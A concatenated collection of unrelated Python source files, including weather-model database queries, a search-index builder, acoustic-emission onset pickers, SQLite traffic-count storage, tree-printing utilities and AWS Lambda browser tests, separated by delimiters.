session: Session, abbreviation: str, projection: str) -> PredictionModelRunTimestamp:
"""
Get the most recent model run of a specified type. (.e.g. give me the global
model at 15km resolution)
params:
:abbreviation: e.g. GDPS or RDPS
:projection: e.g. latlon.15x.15
"""
return session.query(PredictionModelRunTimestamp).\
join(PredictionModel).\
filter(PredictionModel.abbreviation == abbreviation, PredictionModel.projection == projection).\
order_by(PredictionModelRunTimestamp.prediction_run_timestamp.desc()).\
first()
def get_prediction_run(session: Session, prediction_model_id: int,
prediction_run_timestamp: datetime.datetime) -> PredictionModelRunTimestamp:
""" load the model run from the database (.e.g. for 2020 07 07 12h00). """
return session.query(PredictionModelRunTimestamp).\
filter(PredictionModelRunTimestamp.prediction_model_id == prediction_model_id).\
filter(PredictionModelRunTimestamp.prediction_run_timestamp ==
prediction_run_timestamp).first()
def create_prediction_run(session: Session, prediction_model_id: int,
prediction_run_timestamp: datetime.datetime) -> PredictionModelRunTimestamp:
""" Create a model prediction run for a particular model.
"""
prediction_run = PredictionModelRunTimestamp(
prediction_model_id=prediction_model_id, prediction_run_timestamp=prediction_run_timestamp)
session.add(prediction_run)
session.commit()
return prediction_run
def get_or_create_prediction_run(session, prediction_model: PredictionModel,
prediction_run_timestamp: datetime.datetime) -> PredictionModelRunTimestamp:
""" Get a model prediction run for a particular model, creating one if it doesn't already exist.
"""
prediction_run = get_prediction_run(
session, prediction_model.id, prediction_run_timestamp)
if not prediction_run:
logger.info('Creating prediction run %s for %s',
prediction_model.abbreviation, prediction_run_timestamp)
prediction_run = create_prediction_run(
session, prediction_model.id, prediction_run_timestamp)
return prediction_run
def _construct_grid_filter(coordinates):
# Run through each coordinate, adding it to the "or" construct.
geom_or = None
for coordinate in coordinates:
condition = PredictionModelGridSubset.geom.ST_Contains(
'POINT({longitude} {latitude})'.format(longitude=coordinate[0], latitude=coordinate[1]))
if geom_or is None:
geom_or = or_(condition)
else:
geom_or = or_(condition, geom_or)
return geom_or
def get_model_run_predictions(
session: Session,
prediction_run: PredictionModelRunTimestamp,
coordinates) -> List:
"""
Get the predictions for a particular model run, for a specified geographical coordinate.
Returns a PredictionModelGridSubset with joined Prediction and PredictionValueType."""
# condition for query: are coordinates within the saved grids
geom_or = _construct_grid_filter(coordinates)
# We are only interested in predictions from now onwards
now = datetime.datetime.now(tz=datetime.timezone.utc)
# Build up the query:
query = session.query(PredictionModelGridSubset, ModelRunGridSubsetPrediction).\
filter(geom_or).\
filter(ModelRunGridSubsetPrediction.prediction_model_run_timestamp_id == prediction_run.id).\
filter(ModelRunGridSubsetPrediction.prediction_model_grid_subset_id == PredictionModelGridSubset.id).\
filter(ModelRunGridSubsetPrediction.prediction_timestamp >= now).\
order_by(PredictionModelGridSubset.id,
ModelRunGridSubsetPrediction.prediction_timestamp.asc())
return query
def get_predictions_from_coordinates(session: Session, coordinates: List, model: str) -> List:
""" Get the predictions for a particular model, at a specified geographical coordinate. """
# condition for query: are coordinates within the saved grids
geom_or = _construct_grid_filter(coordinates)
# We are only interested in the last 5 days.
now = datetime.datetime.now(tz=datetime.timezone.utc)
back_5_days = now - datetime.timedelta(days=5)
# Build the query:
query = session.query(PredictionModelGridSubset, ModelRunGridSubsetPrediction, PredictionModel).\
filter(geom_or).\
filter(ModelRunGridSubsetPrediction.prediction_timestamp >= back_5_days,
ModelRunGridSubsetPrediction.prediction_timestamp <= now).\
filter(PredictionModelGridSubset.id ==
ModelRunGridSubsetPrediction.prediction_model_grid_subset_id).\
filter(PredictionModelGridSubset.prediction_model_id == PredictionModel.id,
PredictionModel.abbreviation == model).\
order_by(PredictionModelGridSubset.id,
ModelRunGridSubsetPrediction.prediction_timestamp.asc())
return query
def get_or_create_grid_subset(session: Session,
prediction_model: PredictionModel,
geographic_points) -> PredictionModelGridSubset:
""" Get the subset of grid points of interest. """
geom = 'POLYGON(({} {}, {} {}, {} {}, {} {}, {} {}))'.format(
geographic_points[0][0], geographic_points[0][1],
geographic_points[1][0], geographic_points[1][1],
geographic_points[2][0], geographic_points[2][1],
geographic_points[3][0], geographic_points[3][1],
geographic_points[0][0], geographic_points[0][1])
grid_subset = session.query(PredictionModelGridSubset).\
filter(PredictionModelGridSubset.prediction_model_id == prediction_model.id).\
filter(PredictionModelGridSubset.geom == geom).first()
if not grid_subset:
logger.info('creating grid subset %s', geographic_points)
grid_subset = PredictionModelGridSubset(
prediction_model_id=prediction_model.id, geom=geom)
session.add(grid_subset)
session.commit()
return grid_subset
def get_processed_file_record(session: Session, url: str) -> ProcessedModelRunUrl:
""" Get record corresponding to a processed file. """
processed_file = session.query(ProcessedModelRunUrl).\
filter(ProcessedModelRunUrl.url == url).first()
return processed_file
def get_prediction_model(session: Session, abbreviation: str, projection: str) -> PredictionModel:
""" Get the prediction model corresponding to a particular abbreviation and projection. """
return session.query(PredictionModel).\
filter(PredictionModel.abbreviation == abbreviation).\
filter(PredictionModel.projection == projection).first()
|
import json
import os
import time
from tqdm import tqdm
from easydict import EasyDict
import pandas as pd
from .index_compression import restore_dict
def find_pos_in_str(zi, mu):
len1 = len(zi)
pl = []
for each in range(len(mu) - len1):
if mu[each:each + len1] == zi: # 找出与子字符串首字符相同的字符位置
pl.append(each)
return pl
def insert_term2dict(term, _dict, doc_id, pos_id):
if term != "":
if term not in _dict.keys():
_dict[term] = dict()
_dict[term]['doc_feq'] = 1
_dict[term]['posting_list'] = dict() # This is for future modification
_dict[term]['posting_list'][doc_id] = [pos_id]
else:
if doc_id not in _dict[term]['posting_list'].keys():
_dict[term]['doc_feq'] += 1
_dict[term]['posting_list'][doc_id] = [pos_id]
else:
_dict[term]['posting_list'][doc_id].append(pos_id)
def write_term_dict2disk(term_dict, filename):
print("\tI'm writing {} to disk...".format(filename))
start = time.time()
term_dict = dict(sorted(term_dict.items(), key=lambda x: x[0]))
term_col = list(term_dict.keys())
doc_feq_col = list()
posting_list_col = list()
for term in tqdm(term_dict.keys()):
doc_feq_col.append(term_dict[term]['doc_feq'])
posting_list = dict(sorted(term_dict[term]['posting_list'].items(), key=lambda x: x[0]))
term_dict[term]['posting_list'] = posting_list
posting_list_col.append(posting_list)
data_frame = pd.DataFrame({'term': term_col, 'doc_feq': doc_feq_col, 'posting_list': posting_list_col})
data_frame.to_csv(filename, index=False, sep=',')
end = time.time()
print("\tFile {} has been successfully wrote to disk in {:.4f} seconds.".format(filename, end - start))
return term_dict
def get_engine_from_csv(file_path, name, mode="vb"):
filename = name + ".csv"
file_name = os.path.join(file_path, name + ".csv")
if filename not in os.listdir(file_path):
raise NameError("No such file : {}.".format(file_name))
print("\tI'm Loading the {} from {}...".format(name, file_name))
start = time.time()
dict_map = dict()
if "compressed" in name:
end = time.time()
print("\tSuccessfully load {} in {:.4f} seconds.".format(name, end - start))
return restore_dict(file_name, mode)
if "dict" in name and "vector_model" not in name and "spell" not in name:
df = pd.read_csv(file_name)
for i, term in enumerate(df['term']):
term = str(term)
dict_map[term] = dict()
dict_map[term]['doc_feq'] = df['doc_feq'][i]
dict_map[term]['posting_list'] = eval(df['posting_list'][i])
if "vector_model" in name:
df = pd.read_csv(file_name)
for i, doc_id in enumerate(df['doc_id']):
dict_map[doc_id] = eval(df['values'][i])
if "spell" in name or "rotation" in name:
df = pd.read_csv(file_name)
for i, key in enumerate(df['key']):
key = str(key)
dict_map[key] = eval(df['value'][i])
end = time.time()
print("\tSuccessfully load {} in {:.4f} seconds.".format(name, end - start))
return dict_map
def parsing_json(file_path):
args_dict = json.load(open(file_path, "rb"))
args = EasyDict()
for key, value in args_dict.items():
args[key] = value
return args
def get_doc_name_from_doc_id(data_path, doc_id):
filenames = os.listdir(data_path)
filenames = sorted(filenames, key=lambda x: int(x.split(".")[0]))
return filenames[doc_id]
def display_query_result(data_path, term, pos):
"""
:param data_path:
:param term:
:param pos:
:return:
"""
filenames = os.listdir(data_path)
filenames = sorted(filenames, key=lambda x: int(x.split(".")[0]))
for doc_id, pos_list in pos.items():
doc_name = filenames[doc_id]
print("{}: {}".format(doc_name, term))
def display_query_result_detailed(data_path, term, pos, k=10):
"""
:param data_path:
:param term:
:param pos:
:param k: Display k words before and after the sentence
:return:
"""
filenames = os.listdir(data_path)
filenames = sorted(filenames, key=lambda x: int(x.split(".")[0]))
for doc_id, pos_list in pos.items():
doc_name = filenames[doc_id]
print("{}: {}".format(doc_name, term))
print("----------------------------------------------------------")
with open(os.path.join(data_path, doc_name), "r") as file:
content = file.read()
raw_term_list = content.split(" ")
for pos_id in pos[doc_id]:
display_content = " ".join(raw_term_list[pos_id - k:pos_id + k + 1])
print(display_content)
file.close()
|
import math
from typing import Tuple
import numpy as np
from numba import njit
@njit
def hinkley(arr: np.ndarray, alpha: int = 5) -> Tuple[np.ndarray, int]:
"""
Hinkley criterion for arrival time estimation.
The Hinkley criterion is defined as the partial energy of the signal
(cumulative square sum) with an applied negative trend (characterized by alpha).
The starting value of alpha is reduced iteratively to avoid wrong picks within the
pre-trigger part of the signal.
Usually alpha values are chosen to be between 2 and 200 to ensure minimal delay.
The chosen alpha value for the Hinkley criterion influences the results significantly.
Args:
arr: Transient signal of hit
alpha: Divisor of the negative trend. Default: 5
Returns:
- Array with computed detection function
- Index of the estimated arrival time (max value)
Todo:
Weak performance, if used with default parameter alpha
References:
- Molenda, M. (2016). Acoustic Emission monitoring of
laboratory hydraulic fracturing experiments. Ruhr-Universität Bochum.
- van Rijn, N. (2017).
Investigating the Behaviour of Acoustic Emission Waves Near Cracks:
Using the Finite Element Method. Delft University of Technology.
"""
n = len(arr)
result = np.zeros(n, dtype=np.float32)
total_energy = 0.0
for i in range(n):
total_energy += arr[i] ** 2
negative_trend = total_energy / (alpha * n)
min_value = math.inf
min_index = 0
partial_energy = 0.0
for i in range(n):
partial_energy += arr[i] ** 2
result[i] = partial_energy - (i * negative_trend)
if result[i] < min_value:
min_value = result[i]
min_index = i
return result, min_index
@njit
def aic(arr: np.ndarray) -> Tuple[np.ndarray, int]:
"""
Akaike Information Criterion (AIC) for arrival time estimation.
The AIC picker basically models the signal as an autoregressive (AR) process.
A typical AE signal can be subdivided into two parts.
The first part containing noise and the second part containing noise and the AE signal.
Both parts of the signal contain non deterministic parts (noise) describable by a
Gaussian distribution.
Args:
arr: Transient signal of hit
Returns:
- Array with computed detection function
- Index of the estimated arrival time (max value)
References:
- Molenda, M. (2016). Acoustic Emission monitoring
of laboratory hydraulic fracturing experiments.
Ruhr-Universität Bochum.
- Bai, F., Gagar, D., Foote, P., & Zhao, Y. (2017).
Comparison of alternatives to amplitude thresholding for onset detection
of acoustic emission signals.
Mechanical Systems and Signal Processing, 84, 717–730.
- van Rijn, N. (2017).
Investigating the Behaviour of Acoustic Emission Waves Near Cracks:
Using the Finite Element Method. Delft University of Technology.
"""
n = len(arr)
result = np.full(n, np.nan, dtype=np.float32)
safety_eps = np.finfo(np.float32).tiny # pylint: disable=E1101
min_value = math.inf
min_index = 0
l_sum = 0.0
r_sum = 0.0
l_squaresum = 0.0
r_squaresum = 0.0
for i in range(n):
r_sum += arr[i]
r_squaresum += arr[i] ** 2
for i in range(n - 1):
l_sum += arr[i]
l_squaresum += arr[i] ** 2
r_sum -= arr[i]
r_squaresum -= arr[i] ** 2
l_len = i + 1
r_len = n - i - 1
l_variance = (1 / l_len) * l_squaresum - ((1 / l_len) * l_sum) ** 2
r_variance = (1 / r_len) * r_squaresum - ((1 / r_len) * r_sum) ** 2
# catch negative and very small values < safety_eps
l_variance = max(l_variance, safety_eps)
r_variance = max(r_variance, safety_eps)
result[i] = (
(i + 1) * math.log(l_variance) / math.log(10) +
(n - i - 2) * math.log(r_variance) / math.log(10)
)
if result[i] < min_value:
min_value = result[i]
min_index = i
return result, min_index
@njit
def energy_ratio(arr: np.ndarray, win_len: int = 100) -> Tuple[np.ndarray, int]:
"""
Energy ratio for arrival time estimation.
Method based on preceding and following energy collection windows.
Args:
arr: Transient signal of hit
win_len: Samples of sliding windows. Default: 100
Returns:
- Array with computed detection function
- Index of the estimated arrival time (max value)
References:
- Han, L., Wong, J., & Bancroft, J. C. (2009).
Time picking and random noise reduction on microseismic data.
CREWES Research Report, 21, 1–13.
"""
n = len(arr)
result = np.zeros(n, dtype=np.float32)
safety_eps = np.finfo(np.float32).tiny # pylint: disable=E1101
max_value = -math.inf
max_index = 0
l_squaresum = 0.0
r_squaresum = 0.0
for i in range(0, win_len):
l_squaresum += arr[i] ** 2
for i in range(win_len, win_len + win_len):
r_squaresum += arr[i] ** 2
for i in range(win_len, n - win_len):
l_squaresum += arr[i] ** 2
r_squaresum += arr[i + win_len] ** 2
l_squaresum -= arr[i - win_len] ** 2
r_squaresum -= arr[i] ** 2
result[i] = r_squaresum / (safety_eps + l_squaresum)
if result[i] > max_value:
max_value = result[i]
max_index = i
return result, max_index
@njit
def modified_energy_ratio(arr: np.ndarray, win_len: int = 100) -> Tuple[np.ndarray, int]:
"""
Modified energy ratio method for arrival time estimation.
The modifications improve the ability to detect the onset of a seismic
arrival in the presence of random noise.
Args:
arr: Transient signal of hit
win_len: Samples of sliding windows. Default: 100
Returns:
- Array with computed detection function
- Index of the estimated arrival time (max value)
References:
- Han, L., Wong, J., & Bancroft, J. C. (2009).
Time picking and random noise reduction on microseismic data.
CREWES Research Report, 21, 1–13.
"""
n = len(arr)
result, _ = energy_ratio(arr, win_len)
max_value = -math.inf
max_index = 0
for i in range(n):
result[i] = (result[i] * abs(arr[i])) ** 3
if result[i] > max_value:
max_value = result[i]
max_index = i
return result, max_index
|
###############################################################################
# convert list of row tuples to list of row dicts with field name keys
# this is not a command-line utility: hard-coded self-test if run
###############################################################################
def makedicts(cursor, query, params=()):
cursor.execute(query, params)
colnames = [desc[0] for desc in cursor.description]
rowdicts = [dict(zip(colnames, row)) for row in cursor.fetchall()]
return rowdicts
if __name__ == '__main__': # self test
import MySQLdb
conn = MySQLdb.connect(host='localhost', user='root', passwd='python')
cursor = conn.cursor()
cursor.execute('use peopledb')
query = 'select name, pay from people where pay < %s'
lowpay = makedicts(cursor, query, [70000])
for rec in lowpay: print rec
|
# This sample uses a non-breaking space, which should generate errors in
# the tokenizer, parser and type checker.
# The space between "import" and "sys" is a non-breaking UTF8 character.
import sys
|
import numpy as np
from time import perf_counter
from os import getcwd
from sqlite3 import connect, Error
# modules imported
id_to_table_name = { 0:'up', 1:'left', 2:'right', 3:'down'}
# Write your code below
def createConnection( db_file):
""" create a database connection to a SQLite database and returns it """
conn = None
try:
conn = connect( db_file)
return conn
except Error as e:
print(e)
return conn
def createTable( db_dir, table_name, func, if_id= False):
""" create a table in a database\n
takes in the directory of the database and the name of the table to be created\n
this table is specific to the current IP detection array\n
func decides what type of table you want to create - vehicles or time\n
Returns the column names of the table as a list.
"""
if if_id:
table_name = id_to_table_name[table_name]
try:
# creating connection
conn = createConnection( db_dir)
# thinking that latest data will be at the last so no other values
if func == 'vehicle':
create_table_sql = """CREATE TABLE IF NOT EXISTS {}(
id INTEGER PRIMARY KEY,
car INTEGER,
motorcycle INTEGER,
bus INTEGER,
truck INTEGER,
person INTEGER,
bicycle INTEGER,
traffic_light INTEGER);""".format( table_name)
elif func == 'time':
create_table_sql = 'CREATE TABLE IF NOT EXISTS '+table_name+'( id INTEGER PRIMARY KEY, time REAL);'
# creating table
conn.execute(create_table_sql)
conn.commit()
# closing connection
conn.close()
except Error as e:
print(e)
# closing connection
conn.close()
if func == 'vehicle':
return ['id', 'car', 'motorcycle', 'bus', 'truck', 'person', 'bicycle', 'traffic_light']
elif func == 'time':
return ['id', 'time']
def insertData( db_dir, table_name, data, func, if_id= False):
"""
Inserts data into the data table\n
db_dir contains the directory of the database\n
table name is the name of the table you want to store value in\n
data is the data to be stored in the table \n
func decides what type of data you want to store - vehicles or time\n
WARNING:\n
data should be an array of dimension (7,) for vehicles and (1,) for time\n
"""
if if_id:
table_name = id_to_table_name[table_name]
# creating connection
conn = createConnection( db_dir)
cur = conn.cursor()
# info_dict = {}
if func == 'vehicle':
# creating SQL statement
sql_statement = 'INSERT INTO {}( car, motorcycle, bus, truck, person, bicycle, traffic_light) VALUES(?,?,?,?,?,?,?) '.format( table_name)
# preparing for the data
elif func=='time':
# creating SQL statement
sql_statement = '''INSERT INTO {}(time) VALUES(?)'''.format( table_name)
# storing data
data= data.tolist()
cur.execute(sql_statement,data)
conn.commit()
# closing connection
conn.close()
return 'data stored'
def getAllData( db_dir, table_name, if_id= False):
"""
Gets all the data from the table in the database\n
db_dir contains the directory of the database\n
table name is the name of the table you want to get values from\n
prints all the values one by one\n
returns the list of the data with each element as the data\n
"""
if if_id:
table_name = id_to_table_name[table_name]
# creating connection
conn = createConnection( db_dir)
cur = conn.cursor()
# getting all data
cur.execute('SELECT * FROM {}'.format( table_name))
data_point = 0
ret_data = []
# looping over the data
while data_point != None:
# taking one point out
data_point = cur.fetchone()
# adding value to return list if data is present
if data_point != None:
ret_data.append( data_point[1:])
else:
break
#closing connection
conn.close()
return ret_data
def getLastPoint( db_dir, table_name, if_id= False):
"""
db_dir contains the directory of the database\n
table name is the name of the table you want to get value from\n
returns the last point of the data from the database\n
"""
if if_id:
table_name = id_to_table_name[table_name]
# creating connection
conn = createConnection( db_dir)
cur = conn.cursor()
# getting all data
cur.execute('''SELECT * FROM {0} WHERE id = ( SELECT MAX(id) FROM {0})'''.format( table_name))
# sql_statement = '''SELECT * FROM {}
# ORDER BY column_name DESC
# LIMIT 1; '''.format( )
data_point = 0
data_point = cur.fetchone()
#closing connection
conn.close()
if data_point != None:
return data_point[1:]
else:
print( 'no data present')
return None
|
# -*- coding: utf-8 -*-
import nmslib
import numpy as np
class InteractionIndex(object):
def __init__(self, interaction_mapper, interaction_vectors, method="ghtree", space="cosinesimil"):
self.im = interaction_mapper
self.interaction_vectors = interaction_vectors
self.index = nmslib.init(method=method, space=space)
self.index.addDataPointBatch(interaction_vectors)
if method == "hnsw":
self.index.createIndex({'post': 2}, print_progress=True)
elif method == "ghtree":
self.index.createIndex()
else:
self.index.createIndex()
# if self.cf.short:
# self.index = nmslib.init(method='ghtree', space='cosinesimil')
# self.index = nmslib.init(method='ghtree', space='l2')
# else:
# # self.index = nmslib.init(method='hnsw', space='cosinesimil')
# # self.index = nmslib.init(method='ghtree', space='l2')
# self.index = nmslib.init(method='ghtree', space='cosinesimil')
# self.index.addDataPointBatch(interaction_vectors)
# # self.index.createIndex({'post': 2}, print_progress=True)
# self.index.createIndex()
def knn_idx_query(self, idx_int, k=1):
try:
query_vector = self.interaction_vectors[idx_int]
except:
print("Error: no corresponding interaction found")
return [], [], []
return self.knn_vector_query(query_vector, k=k)
def knn_vector_query(self, vec, k=1):
query_vector = vec
ids, distances = self.index.knnQuery(query_vector, k=k)
ret_interaction = [self.im.num_to_interaction(id) for id in ids]
return ret_interaction, ids, distances
def knn_interaction_query(self, interaction_str, k=1):
return self.knn_idx_query(self.im.interaction_to_num(interaction_str), k=k)
def safe(self, path):
np.savetxt(path + "/interaction_index.txt", self.interaction_vectors, delimiter=",")
self.im.save(path)
|
import numpy as np
import pandas as pd
def main(payload):
df_list = []
for key, value in payload.items():
df = pd.DataFrame(value)
df = df.set_index("timestamp")
if key != "base":
df = df.rename(
columns={
"value": key,
"data": key,
},
)
df_list.append(df)
response_df = pd.concat(df_list, axis=1)
response_df = response_df.replace({np.nan: None})
response_df["timestamp"] = response_df.index
response = response_df.to_dict(orient="records")
return response
|
import numpy as np
import matplotlib.pyplot as plt
''' Shot Accuracy Plot
ticks = [5,6,7,8,9,10,11,12,13,14,15]#[1,2,3,4,5]
data_lists = [
[92.35,92.52,93.2,93.71,93.85,94.15,94.22,94.37,94.68,94.73,94.82],
[89.15,89.74,90.41,90.88,91.31,91.47,91.84,92.03,92.2,92.3,92.48],
[86.13,86.98,87.8,88.15,88.71,89.22,89.43,89.6,89.87,90.05,90.16],
[80.04,81.38,82.39,83.09,83.61,84.21,84.6,85.16,85.35,85.79,85.99]
]#[[0.4,1.2,2.3,4,5.5]]
label_lists = [
'VirusShare_00177 5-way',
'VirusShare_00177 10-way',
'APIMDS 5-way',
'APIMDS 10-way'
]#['test1']
color_lists = ['red', 'red', 'royalblue', 'royalblue'] #['red']
marker_lists = ['o', '^', 'o', "^"]#['.']
'''
ticks = [50,100,150,200,250,300,350,400,450,500]
data_lists = [
[91.04,91.71,92.11,92.35,91.8,91.55,90.71,91.05,90.22,90.12],
[87.44,88.64,88.7,89.15,88.07,87.88,87.77,87.64,87.46,87.02],
[77.7,82.37,84.97,85.57,85.92,86.16,86.32,83.78,84.3,84.27],
[69.09,75.63,79,80.04,79.61,80.04,79.42,77.09,78.87,76.9]
]
label_lists = [
"VirusShare_00177 5-shot 5-way",
"VirusShare_00177 5-shot 10-way",
"APIMDS 5-shot 5-way",
"APIMDS 5-shot 10-way"
]
color_lists = ['orange', 'orange', 'lightgreen', 'lightgreen']
marker_lists = ['S', 'D', 'S', 'D']
marker_size = 6
title = ''
x_title = 'Sequence Length'
y_title = 'Accuracy(%)'
fig_size = (10,8)
dpi = 300
plt.figure(dpi=dpi)
plt.xticks(ticks)
plt.title(title)
plt.xlabel(x_title)
plt.ylabel(y_title)
plt.grid(True)
for data,label,color,marker in zip(data_lists,label_lists,color_lists,marker_lists):
plt.plot(ticks, data, color=color, marker=marker, label=label, markersize=marker_size)
plt.legend()
plt.show()
|
class TreeUtils:
@staticmethod
def print_tree_indent(T, p, depth):
''' prints tree in preorder manner
Cars
BMW
BMW_M4
AUDI
AUDI_A6
FIAT
MERCEDES
MERCEDES CLA
MERCEDES C63 AMG
VOLVO
To print the whole tree use this function with arguments (T, T.root(), 0)
'''
print(2*depth*' ' + str(p.element()))
for c in T.children(p):
TreeUtils.print_tree_indent(T, c, depth+1)
@staticmethod
def print_tree_labeled_ident(T, p, depth):
''' prints tree in preorder manner
Cars
1 BMW
1.1 BMW_M4
2 AUDI
2.1 AUDI_A6
3 FIAT
4 MERCEDES
4.1 MERCEDES CLA
4.2 MERCEDES C63 AMG
5 VOLVO
To print the whole tree use this function with arguments (T, T.root(), 0)
'''
TreeUtils._print_tree_labeled_indent(T, p, depth, list())
@staticmethod
def _print_tree_labeled_indent(T, p, depth, path):
''' private function '''
label = '.'.join(str(j+1) for j in path)
print(2*depth*' ' + label + ' ' + str(p.element()))
path.append(0)
for c in T.children(p):
TreeUtils.print_tree_indent(T, c, depth+1, path)
path[-1]+=1
path.pop()
@staticmethod
def print_tree_parenthesize(T, p):
print(p.element(), end='')
first = True
for c in T.children(p):
part = ' (' if first else ', '
print(part, end='')
TreeUtils.print_tree_parenthesize(T, c)
first = False
print(')', end='')
|
for i in range(1, 6):
if i == 3:
continue
print(i)
|
from slovnet.markup import SyntaxMarkup
from slovnet.mask import split_masked
from .base import Infer
class SyntaxDecoder:
def __init__(self, rels_vocab):
self.rels_vocab = rels_vocab
def __call__(self, preds):
for pred in preds:
head_ids, rel_ids = pred
ids = [str(_ + 1) for _ in range(len(head_ids))]
head_ids = [str(_) for _ in head_ids.tolist()]
rels = [self.rels_vocab.decode(_) for _ in rel_ids]
yield ids, head_ids, rels
class SyntaxInfer(Infer):
def process(self, inputs):
for input in inputs:
input = input.to(self.model.device)
pred = self.model(input.word_id, input.shape_id, input.pad_mask)
mask = ~input.pad_mask
head_id = self.model.head.decode(pred.head_id, mask)
head_id = split_masked(head_id, mask)
rel_id = self.model.rel.decode(pred.rel_id, mask)
rel_id = split_masked(rel_id, mask)
yield from zip(head_id, rel_id)
def __call__(self, items):
inputs = self.encoder(items)
preds = self.process(inputs)
preds = self.decoder(preds)
for item, pred in zip(items, preds):
ids, head_ids, rels = pred
tuples = zip(ids, item, head_ids, rels)
yield SyntaxMarkup.from_tuples(tuples)
|
from kivy.uix.image import Image
# A graphics manager that manages loading images and provides utility
# for other classes to retrieve them.
class Graphics:
SHEET_TILE_WIDTH = 16
SHEET_TILE_HEIGHT = 16
SHEET_WIDTH_IN_TILES = 21
SHEET_HEIGHT_IN_TILES = 5
def __init__(self):
self.map_sheet = Image(source="dungeon.png")
def get_map_texture(self, index):
# Determine the x and y value of an index. X is tiles to the right and Y is
# tiles up from the bottom. The bottom left tile is index 0 and increases to the
# right and filling up the row and progressing upward.
x, y = index % self.SHEET_WIDTH_IN_TILES, index // self.SHEET_WIDTH_IN_TILES
# There were issues involved with using the entire tile. When scaled, bits
# and pieces outside the region specified were displayed. A one pixel buffer
# is then created around the tile.
# TODO: Determine the root cause and see if the issue above can be resolved.
return self.map_sheet.texture.get_region(x * self.SHEET_TILE_WIDTH + 1, \
y * self.SHEET_TILE_HEIGHT + 1, self.SHEET_TILE_WIDTH - 2, \
self.SHEET_TILE_HEIGHT - 2)
|
from gw_bot.Deploy import Deploy
from osbot_aws.helpers.Test_Helper import Test_Helper
from osbot_aws.apis.Lambda import Lambda
class test_Chrome_in_Lambda(Test_Helper):
def setUp(self):
super().setUp()
self.lambda_name = 'osbot_browser.lambdas.dev.lambda_shell'
self._lambda = Lambda(self.lambda_name)
def test_update_lambda(self):
self.result = Deploy().deploy_lambda__browser_dev(self.lambda_name)
#@trace(include=['osbot*', 'boto*'])
def test_reset_lambda(self):
self.result = self._lambda.shell().reset()
def test_update_and_invoke(self):
code = """
from osbot_aws.Dependencies import load_dependencies
load_dependencies('pyppeteer2')
from osbot_browser.chrome.Chrome_Sync import Chrome_Sync
chrome = Chrome_Sync().keep_open()
chrome.browser()
#result = chrome.open('https://news.google.com').url()
#from osbot_utils.utils.Misc import bytes_to_base64
#result = bytes_to_base64(chrome.screenshot())
result = chrome.chrome.chrome_setup.connect_method()
"""
self.test_update_lambda()
#self.test_reset_lambda()
self.result = self._lambda.shell().python_exec(code)
def test_update_and_invoke__test(self):
code = """
from osbot_aws.Dependencies import load_dependencies
load_dependencies('pyppeteer2,websocket-client')
from osbot_browser.chrome.Chrome import Chrome
#chrome = Chrome().keep_open()
#from osbot_utils.utils.Http import GET
#result = GET('http://127.0.0.1:54433')
#result = chrome.get_last_chrome_session()
#browser = chrome.sync_browser() # launch it
#browser = Chrome().keep_open().sync_browser() # attach
#result = chrome.connect_method()
from osbot_utils.decorators.Sync import sync
@sync
async def local_chrome():
from osbot_browser.chrome.Chrome import Chrome
from pyppeteer import connect, launch
from osbot_utils.utils.Http import GET
chrome = Chrome().keep_open()
url_chrome = chrome.get_last_chrome_session().get('url_chrome')
#"ws://127.0.0.1:51059/devtools/browser/b2f81e97-78e6-417d-9487-4678b9b94121"
# "ws://127.0.0.1:51059/devtools/browser/b2f81e97-78e6-417d-9487-4678b9b94121"
#return url_chrome
url = "http://127.0.0.1:51059/json/version"
#return GET(url)
await connect({'browserWSEndpoint': url_chrome})
return port_is_open(url_chrome)
await chrome.browser_connect()
return chrome.connect_method()
chrome = Chrome()#.keep_open()
chrome.sync_browser()
result = chrome.connect_method()
# Chrome().keep_open().sync__setup_browser()
# Chrome().keep_open().sync__setup_browser() #.sync_browser()
#result = local_chrome()
# @sync
# async def version():
# from osbot_browser.chrome.Chrome import Chrome
# return await Chrome().keep_open().version()
# chrome = Chrome()
# await chrome.browser()
# return chrome.chrome_executable()
# #'HeadlessChrome/67.0.3361.0'
#
# result = version()
"""
#self.test_update_lambda()
self.result = self._lambda.shell().python_exec(code)
#def test_get_browser_version(self):
#'https://www.whatismybrowser.com/'
# test running webserver in Lambda
def test_run_webserver_in_lambda(self):
#self._lambda.shell().reset()
#self.test_update_lambda()
code = """
from osbot_aws.Dependencies import load_dependencies
load_dependencies('pyppeteer,websocket-client')
from osbot_browser.chrome.Chrome import Chrome
chrome = Chrome()
load_dependencies('requests')
from osbot_browser.browser.Web_Server import Web_Server
from osbot_utils.utils.Misc import bytes_to_base64
chrome.sync__setup_browser()
#page = chrome.sync_page()
#web_server = Web_Server()
#web_server.port = 1234
#web_server.start()
#with Web_Server() as web_server:
#chrome.sync_open(web_server.url())
chrome.sync_open('http://localhost:1234/')
result = bytes_to_base64(chrome.sync_screenshot())
#
# chrome.sync_open('https://www.google.com')
# bytes = chrome.sync_screenshot()
# import base64
# result = base64.b64encode(bytes).decode()
# #result = chrome.sync_url()
"""
self.png_data = self._lambda.shell().python_exec(code)
def test_invoke_shell_commands(self):
shell = self.result = self._lambda.shell()
#self.result = shell.ls('/tmp')
print('-----')
print(shell.ps())
#self.result = shell.memory_usage()
print(shell.list_processes())
#todo: add chrome logs fetch
#todo: add ngrok support
#todo: news.google.com is not working
#bytes = chrome.sync_open('https://news.google.com')
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
KvMemNN model for ConvAI2 (personachat data).
"""
from parlai.core.build_data import download_models
def download(datapath):
opt = {'datapath': datapath}
opt['model'] = 'legacy:seq2seq:0'
opt['model_file'] = 'models:convai2/seq2seq/convai2_self_seq2seq_model'
opt['dict_file'] = 'models:convai2/seq2seq/convai2_self_seq2seq_model.dict'
opt['dict_lower'] = True
opt['model_type'] = 'seq2seq' # for builder
fnames = [
'convai2_self_seq2seq_model.tgz',
'convai2_self_seq2seq_model.dict',
'convai2_self_seq2seq_model.opt',
]
download_models(opt, fnames, 'convai2', version='v3.0')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Arne Neumann <discoursegraphs.programming@arne.cl>
"""
The ``discoursegraph`` module specifies a ``DisourseDocumentGraph``,
the fundamential data structure used in this package. It is a slightly
modified ``networkx.MultiDiGraph``, which enforces every node and edge to have
a ``layers`` attribute (which maps to the set of layers (str) it belongs to).
TODO: implement a DiscourseCorpusGraph
"""
import itertools
import sys
import warnings
from collections import defaultdict, OrderedDict
from networkx import MultiGraph, MultiDiGraph, is_directed_acyclic_graph
from discoursegraphs.relabel import relabel_nodes
from discoursegraphs.util import natural_sort_key
